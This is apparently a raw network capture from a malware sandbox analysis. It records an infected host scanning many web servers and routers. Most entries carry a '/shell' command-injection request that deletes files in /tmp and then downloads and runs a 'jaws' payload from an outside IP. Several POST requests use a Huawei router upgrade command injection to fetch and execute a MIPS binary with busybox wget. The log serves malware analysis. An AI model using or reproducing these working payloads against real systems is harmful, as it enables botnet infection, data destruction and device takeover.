                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          318192.168.2.2337854208.70.77.18180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.121131897 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          319192.168.2.234220434.242.70.14380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.208180904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.457590103 CET450INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:43 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          320192.168.2.2344200209.97.134.8680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.211070061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.470464945 CET296INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 154
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          321192.168.2.234254493.241.196.4980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.250962973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:44.618568897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:46.218282938 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:49.545770884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.944863081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:08.743067026 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:35.875246048 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          322192.168.2.2339924101.42.248.24080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.377309084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.698115110 CET444INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:43 GMT
                                                          Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.4.29
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          323192.168.2.2340674166.161.129.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:44.925324917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          324192.168.2.233457257.180.62.6880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:44.984669924 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.257424116 CET425INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Server: Apache/2.4.58 () PHP/5.4.16
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          325192.168.2.2359276198.154.232.24280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.021090031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.175298929 CET525INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:35 GMT
                                                          Server: Apache
                                                          Content-Length: 347
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          326192.168.2.2341798154.208.198.21480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.035887957 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.360543966 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          327192.168.2.233297223.207.79.24480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.082175970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.452538967 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 64 30 31 63 30 34 35 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 35 26 23 34 36 3b 37 35 37 33 61 35 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4d01c045&#46;1704173085&#46;7573a5d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          328192.168.2.23463742.16.231.22580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.225996017 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.467701912 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:45 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 64 36 39 64 64 35 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 35 26 23 34 36 3b 32 65 36 32 62 38 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;bd69dd58&#46;1704173085&#46;2e62b87</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          329192.168.2.235033618.176.244.12780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.251137018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          330192.168.2.2359376146.75.21.14380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.316760063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:45.612858057 CET159INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 11
                                                          content-type: text/plain; charset=utf-8
                                                          x-served-by: cache-mnl9728
                                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          331192.168.2.2356258156.254.100.15537215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:45.346009970 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:46.890192986 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:48.713934898 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
